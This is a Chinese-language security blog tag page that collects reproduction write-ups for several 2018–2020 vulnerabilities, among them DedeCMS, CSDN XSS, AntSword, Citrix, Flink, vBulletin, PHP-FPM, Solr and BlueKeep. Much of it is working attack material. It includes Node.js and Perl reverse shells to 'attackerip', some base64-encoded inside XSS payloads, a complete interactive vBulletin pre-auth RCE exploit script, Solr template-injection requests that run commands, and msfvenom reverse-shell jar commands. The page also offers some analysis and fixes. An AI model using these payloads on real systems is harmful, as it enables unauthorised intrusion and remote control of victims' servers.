Tag:漏洞重现

Tag (漏洞重现)'s result:

dedecms rce cve-2018-20129漏洞重现

一个鸡肋的老洞,具体分析见: https://www.anquanke.com/post/id/168458 https://xz.aliyun.com/t/1976 https://www.jianshu.com/p/b0eb694be4ac   大概原理: 管理员登录,会员功能开启,利用编辑器上传图片过滤不严,正则替换%,*,?等字符为空,可被利用绕过过滤(如zxc.jpg.p%hp,zxc.jpg?ph%p,zxc.jpg.p?hp) //据说要用构造图片马避免渲染失效,但是本人当时好像直接传常规图片马即可……   漏洞文件: select_images_post.php 关键代码: <?php /** * 图片选择 * * @version $Id: select_images_post.php 1 9:43 2010年7月8日Z tianya $ * @package DedeCMS.Dialog * @copyright Copyright (c) 2007 – 2010, DesDev, Inc. * @license http://help.dedecms.com/usersguide/license.html * @link http://www.dedecms.com */ require_once(dirname(__FILE__).”/config.php”); require_once(dirname(__FILE__).”/../image.func.php”); if(empty($activepath)) { $activepath =”; $activepath = str_replace(‘.’, ”, $activepath); $activepath = preg_replace(“#\/{1,}#”, ‘/’, $activepath); if(strlen($activepath) < strlen($cfg_image_dir)) { $activepath = $cfg_image_dir; } } if(empty($imgfile)) { $imgfile=”; } if(!is_uploaded_file($imgfile)) { ShowMsg(“你没有选择上传的文件!”.$imgfile, “-1”); exit(); } $CKEditorFuncNum = (isset($CKEditorFuncNum))? $CKEditorFuncNum : 1; $imgfile_name = trim(preg_replace(“#[ \r\n\t\*\%\\\/\?><\|\”:]{1,}#”, ”, $imgfile_name)); if(!preg_match(“#\.(“.$cfg_imgtype.”)#i”, $imgfile_name)) { ShowMsg(“你所上传的图片类型不在许可列表,请更改系统对扩展名限定的配置!”, “-1”); exit(); } $nowtme = time(); $sparr = Array(“image/pjpeg”, “image/jpeg”, “image/gif”, “image/png”, “image/xpng”, “image/wbmp”); $imgfile_type = strtolower(trim($imgfile_type)); if(!in_array($imgfile_type, $sparr)) { ShowMsg(“上传的图片格式错误,请使用JPEG、GIF、PNG、WBMP格式的其中一种!”,”-1″); exit(); } $mdir = MyDate($cfg_addon_savetype, $nowtme); if(!is_dir($cfg_basedir.$activepath.”/$mdir”)) { MkdirAll($cfg_basedir.$activepath.”/$mdir”,$cfg_dir_purview); CloseFtp(); } $filename_name = $cuserLogin->getUserID().’-‘.dd2char(MyDate(“ymdHis”, $nowtme).mt_rand(100,999)); $filename = $mdir.’/’.$filename_name; $fs = explode(‘.’, $imgfile_name); $filename = $filename.’.’.$fs[count($fs)-1]; $filename_name = $filename_name.’.’.$fs[count($fs)-1]; $fullfilename = $cfg_basedir.$activepath.”/”.$filename; move_uploaded_file($imgfile, $fullfilename) or die(“上传文件到 $fullfilename 失败!”); if($cfg_remote_site==’Y’ && $remoteuploads == 1) { //分析远程文件路径 $remotefile = str_replace(DEDEROOT, ”, $fullfilename); $localfile = ‘../..’.$remotefile; //创建远程文件夹……

CSDN 存储型XSS分析

20190724,网上传出csdn貌似有存储型XSS,弹框链接: https://bbs.csdn.net/topics/390816889 解码是”提交成功” 搜索这个词 抓包判断该post包触发弹窗 尝试修改响应包 请求 https://bbs.csdn.net/topics/390816889 会发请求 GET /redisData/baiduLandingWord?url=https://bbs.csdn.net/topics/390816889&size=1 HTTP/1.1 Host: redisdatarecall.csdn.net Connection: close Accept: application/json, text/javascript, */*; q=0.01 Origin: https://bbs.csdn.net User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Referer: https://bbs.csdn.net/topics/390816889 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 这个请求是在百度站内查询 再请求,将查询内容写入redis 再请求,返回了推荐的关联帖子的内容,内容(‘提交成功’)经过了html实体编码,引号还原了。(不确定……) 该返回造成弹窗。 触发流程: 1.发布帖子写入payload(如Response.Write(“<script>alert(‘提交成功!’);window.location.href=window.location.href;window.opener.location=window.opener.location;</script>”);) 2.百度搜索引擎爬到该payload帖子。 3.某相关话题帖子推荐到payload帖子,加载到某相关话题帖子的页面。 4.触发payload。   相关链接 https://redisdatarecall.csdn.net/redisData/baiduLandingWord?url=https://bbs.csdn.net/topics/390816889&size=1 https://event.csdn.net/logstores/csdn-pc-tracking-page-exposure/track https://zhannei-dm.csdn.net/recommend/baidu_zhannei_search?keyword=%E5%85%B3%E4%BA%8Ewindow.location.href%E7%9A%84xss https://recsidebar.csdn.net/getSideBarRecommend.html   不确定分析的对不对,如有错漏,强烈建议指出…….

Atlassian Crowd and Crowd Data Center RCE 漏洞重现(CVE-2019-11580)

201907,网上爆出Atlassian Crowd and Crowd Data Center RCE 漏洞,重现一下。     curl -k -H “Content-Type: multipart/mixed” \ –form “file_cdl=@rce.jar” http://10.10.20.166:8095/crowd/admin/uploadplugin.action Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-1059463178748466378rce.jar https://github.com/jas502n/CVE-2019-11580  

antsword xss漏洞重现

0x00 概述 20190412,antsword的github上有个issus https://github.com/AntSwordProject/antSword/issues/147 因为toastr错误信息以html返回并且没有严格过滤导致xss,新版本修复不支持html。 比较有趣,重现一下   0x01 漏洞重现 环境:win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5 1) XSS xss webshell: <?php header(‘HTTP/1.1 500 <img src=# onerror=alert`x`>’);   2) RCE win+nodejs 成功反弹shell。 var net = require(“net”), sh = require(“child_process”).exec(“cmd.exe”); var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?>   未成功的组合: win+perl perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ # Win 平台 perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLU1JTyAtZSBcJiMzOTskYz1uZXcgSU86OlNvY2tldDo6SU5FVChQZWVyQWRkciwiMTI3LjAuMC4xOjY2NzciKTtTVERJTi0mZ3Q7ZmRvcGVuKCRjLHIpOyR+LSZndDtmZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGUmbHQ7Jmd0OztcJiMzOTsmIzM5OywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0mZ3Q7ew0KICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOw0KICB9KTs=`,`base64`).toString())’>”); ?> require(‘child_process’).exec(‘perl -MIO -e \’$c=new IO::Socket::INET(PeerAddr,”127.0.0.1:6677″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); Linux+perl 反弹 未测试 require(‘child_process’).exec(‘perl -e \’use Socket;$i=”127.0.0.1″;$p=6677;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};\”,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); }); <?php header(“HTTP/1.1 406 Not <img src=# onerror=’eval(new Buffer(`cmVxdWlyZSgmIzM5O2NoaWxkX3Byb2Nlc3MmIzM5OykuZXhlYygmIzM5O3BlcmwgLWUgXCYjMzk7dXNlIFNvY2tldDskaT0iMTI3LjAuMC4xIjskcD02Njc3O3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCImZ3Q7JlMiKTtvcGVuKFNURE9VVCwiJmd0OyZTIik7b3BlbihTVERFUlIsIiZndDsmUyIpO2V4ZWMoIi9iaW4vYmFzaCAtaSIpO307XCYjMzk7JiMzOTssKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9Jmd0O3sNCiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsNCiAgfSk7`,`base64`).toString())’>”); ?> Linux+nodejs 未测试 var net = require(“net”), sh = require(“child_process”).exec(“/bin/bash”);var client = new net.Socket(); client.connect(6677, “127.0.0.1”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); <?php header(“HTTP/1.1 500 Not <img src=# onerror=’eval(new Buffer(`dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCIvYmluL2Jhc2giKTt2YXIgY2xpZW50ID0gbmV3IG5ldC5Tb2NrZXQoKTsNCmNsaWVudC5jb25uZWN0KDY2NzcsICIxMjcuMC4wLjEiLCBmdW5jdGlvbigpe2NsaWVudC5waXBlKHNoLnN0ZGluKTtzaC5zdGRvdXQucGlwZShjbGllbnQpOw0Kc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=`,`base64`).toString())’>”); ?> var Process = window.parent.top.process.binding(‘process_wrap’).Process;var proc = new Process(); proc.onexit = function (a, b) {};var env = window.parent.top.process.env;var env_ = [];for (var key in env) env_.push(key + ‘=’ + env[key]); proc.spawn({ file: ‘cmd.exe’, args: [‘/k……

citrix netscaler网关RCE漏洞重现及分析(CVE-2019-19781)

0x00 概述 201912,网上爆出citrix网管的rce漏洞,具体细节已公开(20200111),此漏洞无需身份验证,影响较大(8w)。首先利用目录穿越(有限文件读取)写入恶意xml文件到特定目录,再利用模板解析造成rce。   0x01 漏洞重现       0x02 修复方案 参考官方 https://support.citrix.com/article/CTX267027   0x03 漏洞分析 //图片来自https://twitter.com/mpgn_x64 从HTTP_NSC_USER获取$username,变量的过滤被注释了…… UsersPrefs perl module: 所以攻击者可以控制$username,作为后续的xml文件名,比如设置成../../some/path造成目录穿越,导致写入到任意目录(./portal/templates/) 而且这个xml内容的title和desc可控 //所有调用这个csd方法的脚本(几乎所有)都会造成目录穿越,如新建书签。 newbm.pl : my $cgi = new CGI;print “Content-type: text/html\n\n”; my $user = NetScaler::Portal::UserPrefs->new(); my $doc = $user->csd(); … my $newurl = Encode::decode(‘utf8’, $cgi->param(‘url’)); my $newtitle = Encode::decode(‘utf8’, $cgi->param(‘title’)); my $newdesc = Encode::decode(‘utf8’, $cgi->param(‘desc’)); my $UI_inuse = Encode::decode(‘utf8’, $cgi->param(‘UI_inuse’)); … my $newBM = { url => $newurl, title => $newtitle, descr => $newdesc, UI_inuse => $UI_inuse, }; … if ($newBM->{url} =~ /^\/){ push @{$doc->{filesystems}->{filesystem}}, $newBM; } else { # bookmark push @{$doc->{bookmarks}->{bookmark}}, $newBM; }// Writing XML file to disk $user->filewrite($doc); 调用filewrite方法写入一些数据到$doc,即可控的文件名($username)。 当恶意的xml文件(Perl Template Toolkit)写入到./portal/templates/这个目录下,利用GET请求/vpn/../vpns/portal/zxcxz.xml就可以使模板工具包引擎加载解析这个恶意xml文件造成rce。 $doc就是$username,$tmplfile变量是从HTTP请求路径构造的,并为该文件构建并处理了一个新模板。   0x04 参考资料 https://twitter.com/mpgn_x64 https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/ https://github.com/jas502n/CVE-2019-19781

Apache flink任意jar上传导致rce漏洞重现

0x00 概述 20191111,网上爆出Apache Flink上传jar包导致远程代码执行的漏洞(安全工程师Henry Chen披露)。因为Apache Flink Dashboard 默认无需认证即可访问,所以可以上传恶意jar包并触发恶意代码执行,从而getshell。 影响范围<= 1.9.1   0x01 漏洞重现 “apache-flink-dashboard” 1)利用MSF msfvenom -p java/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=7766 W >poc.jar 2)利用nc msfvenom -p java/shell_reverse_tcp lhost=1.2.3.4 lport=7766 -f jar > poc.jar   0x02 防御方案 1.设置防火墙策略,仅允许白名单ip访问 apache flink。 2.Web代理(如apache httpd)中增加对该服务的digest认证。 3.关注官网新版本或补丁更新。        

vBulletin 5.x 0day pre-auth RCE漏洞重现

0x00 概述 201909 vbulletin5(5.0.0-5.5.4)爆出rce漏洞,利用文件ajax/render/widget_php和post参数widgetConfig[code]可直接远程代码执行。   0x01 漏洞重现 https://seclists.org/fulldisclosure/2019/Sep/31 #!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # – site:*.vbulletin.net # – “Powered by vBulletin Version 5.5.4”   import requests import sys   if len(sys.argv) != 2: sys.exit(“Usage: %s <URL to vBulletin>” % sys.argv[0])   params = {“routestring”:”ajax/render/widget_php”}   while True: try: cmd = raw_input(“vBulletin$ “) params[“widgetConfig[code]”] = “echo shell_exec(‘”+cmd+”‘); exit;” r = requests.post(url = sys.argv[1], data = params) if r.status_code == 200: print r.text else: sys.exit(“Exploit failed! :(“) except KeyboardInterrupt: sys.exit(“\nClosing shell…”) except Exception, e: sys.exit(str(e))   0x02 检测工具 https://github.com/theLSA/vbulletin5-rce   0x03 修复方案 打补丁。    

PHP+nginx RCE(CVE-2019-11043)漏洞重现

0x00 概述 来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中,向服务器发送%0a(换行符)时,服务器返回异常信息,疑似存在漏洞。 当Nginx使用特定的fastcgi配置时,存在远程代码执行漏洞,但这个配置并非Nginx默认配置。当fastcgi_split_path_info字段被配置为 ^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞,该配置已被广泛使用,危害较大。 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致nginx传递给php-fpm的 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷,所以攻击者可以使用换行符(%0a)来破坏`fastcgi_split_path_info`指令中的Regexp。 Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。   0x01 影响范围 当Nginx + php-fpm 的服务器有如下配置的时候,都会出现RCE漏洞 location ~ [^/]\.php(/|$) { fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO       $fastcgi_path_info; fastcgi_pass   php:9000; … } } 5.6 crash 7 rce   0x02 漏洞重现 https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043/README.zh-cn.md https://github.com/neex/phuip-fpizdam //go install //go get -v //go build     https://github.com/search?q=fastcgi_split_path&type=Code 某大神分享的nextcloud案例: https://docs.nextcloud.com/server/17/admin_manual/installation/nginx.html https://www.zoomeye.org/searchResult?q=nextcloud+%2Bserver:Nginx+%2B&t=all   0x03 数据流量 据说这个exp写得十分精妙。   0x04 修复方案 根据需求,将以下配置删除 fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO       $fastcgi_path_info; or 补丁 https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest   0x05 结语 还是有不少这样配置的,影响较大。   0x06 参考资料 https://mp.weixin.qq.com/s?src=11&timestamp=1572095484&ver=1936&signature=oPmPaXehqGEgAHy6nc0mARQbu5NbL-3GTFrbcxQghC4qvehLlpE9ohw6uTuP0hwcmtOvA3mZWUXhOEImDu0*ltYMJmrMrb-ATqNxOqEMYmV7yV4ntWOQl2JYrhx4*MQ2&new=1  

apache solr velocity模板注入漏洞重现

0x00 概述 20191031 网上爆出apache solr velocity模板注入的rce漏洞,该漏洞由国外安全研究员s00py公开,当solr默认插件VelocityResponseWrite中params.resource.loader.enabled参数值为true(默认false),再通过精心构造的get请求即可RCE。 //如果存在solr未授权访问,可post直接修改params.resource.loader.enabled参数值为true 影响范围在solr 5.x – 8.2.0  (with config api)   0x01 漏洞重现 solr-spec 6.6.1 先利用未授权修改params.resource.loader.enabled参数值为true POST /solr/test/config HTTP/1.1 Host: solr:8983 Content-Type: application/json Content-Length: 259 { “update-queryresponsewriter”: { “startup”: “lazy”, “name”: “velocity”, “class”: “solr.VelocityResponseWriter”, “template.base.dir”: “”, “solr.resource.loader.enabled”: “true”, “params.resource.loader.enabled”: “true” } } 再 GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: localhost:8983   0x02 检测工具 https://github.com/theLSA/solr-rce   0x03 防御方案 1.配置授权访问solr控制台。 2.配置文件configoverlay.json设置只读   0x04 参考资料 https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

CVE-2019-0708 RDP RCE漏洞重现(20190907-MSF-EXP)

0x00 概述 前情提要RDP RCE(CVE-2019-0708)集锦 20190907 msf更新cve-2019-0708的exp,瞬间一片震动,经测试,该exp在特定条件下可用。   0x01 影响范围 Target: 0 Automatic targeting via fingerprinting 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 – Hyper-V)   0x02 漏洞重现 1.环境:msf5.0.46dev,vm12.5.7,nat,win7旗舰版x64sp1-7601(cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso)开启3389,reload_all 修改后的4个rb文件,target 2。 cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/ rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb 2. 环境 cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_x64_dvd_617598.iso 不改注册表   修改注册表 //HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam为0 未发现该注册表键值,手动增加并设置0 还是蓝屏   注: 2008r2withsp1 english standard需要修改注册表[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam]值修改为0。 打一次要重启靶机一次否则可能会失败。 Windows 2008 r2据说很多都蓝屏…… 更新msf到最新。 调低核心数如2核心2g/1核1g……(多核竞争?) 关闭自动更新防止自动打补丁影响测试。   0x03 结语 目前这个exp如果要利用成功,限制过多,如操作系统版本号,平台,安全设备等诸多因素会影响,估计实战成功率不高,不过这已经是一个大飞跃,预计不久后会有更完善的exp出现。 蠕虫正步步紧逼……   0x04 参考资料 https://github.com/rapid7/metasploit-framework/pull/12283 https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/